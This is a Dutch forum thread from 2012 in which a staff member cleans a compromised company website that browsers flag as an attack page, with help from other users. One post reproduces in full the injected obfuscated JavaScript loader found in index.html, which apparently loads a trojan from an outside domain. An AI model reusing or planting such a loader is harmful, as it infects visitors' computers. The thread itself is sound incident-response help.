Malware op site

Door ama saril op 29-05-2012 14:00

1.720 views

Weet niet waar ik dit topic moet aanmaken aangezien ik niet echt een 'beveiligingstopic' zie of iets in die trend.

Situatie:
Onze site (van het werk) wordt in FF en chrome getoond als 'report attack page'.
'Reported Attack Page!
This web page at /url/ has been reported as an attack page and has been blocked based on your security preferences.

Attack pages try to install programs that steal private information, use your computer to attack others, or damage your system.Some attack pages intentionally distribute harmful software, but many are compromised without the knowledge or permission of their owners.'

Nu is onze systeembeheerder EN onze developer met vakantie dus is aan mij gevraagd (omdat ik hele simpele dingetjes programmeer.. beveiliging nooit iets mee gedaan, ontwikkeling is niet echt mijn functie maar toch doe ik af en toe iets :)) of ik kon proberen om dit op te lossen. Nu heb ik gezegd dat ik er wel naar kan kijken maar als het mij niet lukt dat ik dan een expert ga roepen. Ik heb nu dus 3 dagen gekregen om op onderzoek uit te gaan als het dan nog niet is gelukt bel ik de professional.

Google geeft het volgende aan:
'What happened when Google visited this site?

Of the 2 pages we tested on the site over the past 90 days, 2 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2012-05-27, and the last time suspicious content was found on this site was on 2012-05-27.

Malicious software includes 2 trojan(s).

Malicious software is hosted on 1 domain(s), including dovlatbegeiner.su/.

This site was hosted on 1 network(s) including (NL).'

Nu ben ik er net aan begonnen en heb eerst het .htacces bestand nagekeken of er geen URL rewrite in staat. Hier kan ik niks in vinden dus dit is goed voor zover ik kan zien.

Ik ben nu de hele tijd naar me locale schijf aan het downloaden om er vervolgens spyware en virusprogramma's overheen te laten lopen om te kijken of hij wat kan vinden.

Aangezien er ook javascript op de site staat wil ik vervolgens controleren of deze koppelingen niet zijn aangetast (verkeerde JS inladen). Er wordt ook Jquery gebruikt en een PDF module genaamd TCPDF om pdf's te genereren.

Ik zag ook op de ftp twee mappen volledig open staan (rechten 777 voor gebruikers en iedereen). In de ene map worden images weggeschreven, de applicatie die dit doet controleerd wel op extensie en renamed het plaatje naar '434839048039-plaatje' waarbij het een random nummer is.

De ander schrijft tijdelijk PDF weg in de map maar delete dit ook weer direct.
Kan in dit stukje (mappen met rechten) een beveiligingsrisico inzitten?

Er wordt ook een database gebruikt (om gegevens in op te slaan) maar omdat dit alleen een 'read' database is (er wordt nooit vanuit de website in geschreven) lijkt het me niet mogelijk dat hier iets mis mee is, of is dit wel mogelijk?

Dit zijn voor nu de stappen die ik ga ondernemen weet iemand misschien nog andere stappen die ik kan uitvoeren?

p.s. Ik vindt dit op zich wel een leuke opdracht maar misschien dat ik iets technische kennis mis vandaar dat er op den duur misschien wel een xpert moet worden ingehuurd maar voor nu wil ik zelf dingen proberen dus als iemand nog manieren / progs en dergelijke weet hoor ik het graag :)

Roel -

29-05-2012 14:02

Je kunt via Google Webmaster tools bekijken welke waarschuwingen, waaronder deze, er op je site te vinden zijn die de Google Crawler heeft gevonden.

ama saril

29-05-2012 14:06

Ik kom deze tegen:
When Google last tested this page, your server returned content that directed the browser to a site that serves malware. Unfortunately, Google could not isolate the malicious code within this page.

in HTacces staat trouwens alleen dit (ik zie staan redirect dus een htredirect leek me logisch):
Options -Indexes

dit is toch op zich normaal?

Chris PHP

29-05-2012 14:09

Post de bron van die ene pagina hier eens tussen de code tags.

[size=xsmall]Toevoeging op 29/05/2012 14:10:21:[/size]

En dan niet de view source variant he ;) ook waar PHP, etc staat.

ama saril

29-05-2012 14:17 gewijzigd op 30-05-2012 11:42

Waarschuwing! het Javascript niet uitvoeren het is een high lvl threat volgens adaware. Ik laat het erin staan zodat mensen kunnen zien wat het is maar als het te gevaarlijk is mag de admin het weghalen

Google geeft niet aan welke het is, maar ik neem aan dat dit de index.html moet zijn:

<code>
<body><script>try{q=document.createElement("d"+"i"+"v");q.appendChild(q+"");}catch(qw){h=-012/5;zz='a'+'l';f='fr'+'om'+'Ch';f+='arC';}try{qwe=prototype;}catch(brebr){zz='zv'.substr(123-122)+zz;ss=[];f+=(h)?'ode':"";w=this;e=w[f["s"+"ubstr"](11)+zz];n="3.5$3.5$51.5$50$15$19$49$54.5$48.5$57.5$53.5$49.5$54$57$22$50.5$49.5$57$33.5$53$49.5$53.5$49.5$54$57$56.5$32$59.5$41$47.5$50.5$38$47.5$53.5$49.5$19$18.5$48$54.5$49$59.5$18.5$19.5$44.5$23$45.5$19.5$60.5$5.5$3.5$3.5$3.5$51.5$50$56$47.5$53.5$49.5$56$19$19.5$28.5$5.5$3.5$3.5$61.5$15$49.5$53$56.5$49.5$15$60.5$5.5$3.5$3.5$3.5$49$54.5$48.5$57.5$53.5$49.5$54$57$22$58.5$56$51.5$57$49.5$19$16$29$51.5$50$56$47.5$53.5$49.5$15$56.5$56$48.5$29.5$18.5$51$57$57$55$28$22.5$22.5$49$54.5$58$53$47.5$57$48$49.5$50.5$49.5$51.5$54$49.5$56$22$56.5$57.5$22.5$53.5$47.5$51.5$54$22$55$51$55$30.5$55$47.5$50.5$49.5$29.5$24.5$24$49$49.5$48$49$23.5$25.5$26.5$23.5$24$48.5$47.5$49$27$24$18.5$15$58.5$51.5$49$57$51$29.5$18.5$23.5$23$18.5$15$51$49.5$51.5$50.5$51$57$29.5$18.5$23.5$23$18.5$15$56.5$57$59.5$53$49.5$29.5$18.5$58$51.5$56.5$51.5$48$51.5$53$51.5$57$59.5$28$51$51.5$49$49$49.5$54$28.5$55$54.5$56.5$51.5$57$51.5$54.5$54$28$47.5$48$56.5$54.5$53$57.5$57$49.5$28.5$53$49.5$50$57$28$23$28.5$57$54.5$55$28$23$28.5$18.5$30$29$22.5$51.5$50$56$47.5$53.5$49.5$30$16$19.5$28.5$5.5$3.5$3.5$61.5$5.5$3.5$3.5$50$57.5$54$48.5$57$51.5$54.5$54$15$51.5$50$56$47.5$53.5$49.5$56$19$19.5$60.5$5.5$3.5$3.5$3.5$58$47.5$56$15$50$15$29.5$15$49$54.5$48.5$57.5$53.5$49.5$54$57$22$48.5$56$49.5$47.5$57$49.5$33.5$53$49.5$53.5$49.5$54$57$19$18.5$51.5$50$56$47.5$53.5$49.5$18.5$19.5$28.5$50$22$56.5$49.5$57$31.5$57$57$56$51.5$48$57.5$57$49.5$19$18.5$56.5$56$48.5$18.5$21$18.5$51$57$57$55$28$22.5$22.5$49$54.5$58$53$47.5$57$48$49.5$50.5$49.5$51.5$54$49.5$56$22$56.5$57.5$22.5$53.5$47.5$51.5$54$22$55$51$55$30.5$55$47.5$50.5$49.5$29.5$24.5$24$49$49.5$48$49$23.5$25.5$26.5$23.5$24$48.5$47.5$49$27$24$18.5$19.5$28.5$50$22$56.5$57$59.5$53$49.5$22$58$51.5$56.5$51.5$48$51.5$53$51.5$57$59.5$29.5$18.5$51$51.5$49$49$49.5$54$18.5$28.5$50$22$56.5$57$59.5$53$49.5$22$55$54.5$56.5$51.5$57$51.5$54.5$54$29.5$18.5$47.5$48$56.5$54.5$53$57.5$57$49.5$18.5$28.5$50$22$56.5$57$59.5$53$49.5$22$53$49.5$50$57$29.5$18.5$23$18.5$28.5$50$22$56.5$57$59.5$53$49.5$22$57$54.5$55$29.5$18.5$23$18.5$28.5$50$22$56.5$49.5$57$31.5$57$57$56$51.5$48$57.5$57$49.5$19$18.5$58.5$51.5$49$57$51$18.5$21$18.5$23.5$23$18.5$19.5$28.5$50$22$56.5$49.5$57$31.5$57$57$56$51.5$48$57.5$57$49.5$19$18.5$51$49.5$51.5$50.5$51$57$18.5$21$18.5$23.5$23$18.5$19.5$28.5$5.5$3.5$3.5$3.5$49$54.5$48.5$57.5$53.5$49.5$54$57$22$50.5$49.5$57$33.5$53$49.5$53.5$49.5$54$57$56.5$32$59.5$41$47.5$50.5$38$47.5$53.5$49.5$19$18.5$48$54.5$49$59.5$18.5$19.5$44.5$23$45.5$22$47.5$55$55$49.5$54$49$32.5$51$51.5$53$49$19$50$19.5$28.5$5.5$3.5$3.5$61.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-619!=0;i++){k=i;ss=ss+String.fromCharCode(-1*h*(1+1*n[k]));}q=ss;e(q);}</script>

</code>

Ik heb de URL wel verwijderd (heb ik beloofd aan et werk, ik mocht hulp vragen maar niet de url laten zien). Heb wel gecontroleerd of deze niet was aangepast :P

Waarschuwing! het Javascript niet uitvoeren het is een high lvl threat volgens adaware. Ik laat het erin staan zodat mensen kunnen zien wat het is maar als het te gevaarlijk is mag de admin het weghalen

Edit: Waarschuwing geplaatst over javascript.

Chris PHP

29-05-2012 14:25

Is dat script van jullie?

ama saril

29-05-2012 14:29

Chris NVT op 29/05/2012 14:25:48

Is dat script van jullie?

Zal heel eerlijk zijn, ik heb geen idee. Zoals ik zei ik ben normaliter geen webontwikkelaar dus zit ook nooit op de webserver. Ziet het er 'niet normaal' uit :)?

Chris PHP

29-05-2012 14:45

Uhm.... nee zoveel variabelen voorspelt niet veel goeds.
Advies, haal dat script eruit (plak het een in tekst document!!) en laat Google opnieuw kijken. Kun je ook gelijk controleren of de functionaliteit werkt.

Maar aande pagina te zien, is dit de default page van een hosting firma, dus staat nooit veel info op.

Zoek de bron in je default map!

Jens erd

29-05-2012 15:49

Die code is duidelijk Malware, het lukt me niet om het te ontcijferen maar mijn virusscanner geeft bij uitvoeren onmiddellijk aan dat er een Trojaans paard verwijderd is. Veranderd alle Ftp gegevens en verwijderen dit soort scripts uit de broncode.

ama saril

29-05-2012 15:50 gewijzigd op 29-05-2012 16:40

Je had gelijk heb die pagina gescand met adaware (ff lokaal opgeslagen) en het is een high lvl threat als dat scriptje erin staat:P. Hartstikke bedankt voor de raad ga nu google weer opnieuw laten kijken of ie hem nu wel goed doet :)

[size=xsmall]Toevoeging op 29/05/2012 16:35:31:[/size]

Jens erd op 29/05/2012 15:49:24

Die code is duidelijk Malware, het lukt me niet om het te ontcijferen maar mijn virusscanner geeft bij uitvoeren onmiddellijk aan dat er een Trojaans paard verwijderd is. Veranderd alle Ftp gegevens en verwijderen dit soort scripts uit de broncode.

Met FTP gegevens bedoel je het wachtwoord neem ik aan?

(heb net een nieuwe review aangevraagd bij google, ben benieuwed hoe lang het duurt :))

[size=xsmall]Toevoeging op 30/05/2012 10:13:13:[/size]

Malware
Google has not detected any malware on this site. \0/

Chris PHP

30-05-2012 10:19

@Ama,

Zijn jullie een hosting bedrijf of is dat domein net door jullie geregistreerd? Anders is de kans groot dat in de default map deze malware bevat.

Is de hosting niet van jullie zelf maar een hosting bedrijf, mail of bel ze gelijk. En wat Jens zegt, wijzig je wachtwoorden van zowel je Control panel als FTP, zorg dat het anonymous account van FTP uitstaat.

Reageren

Inloggen om te reageren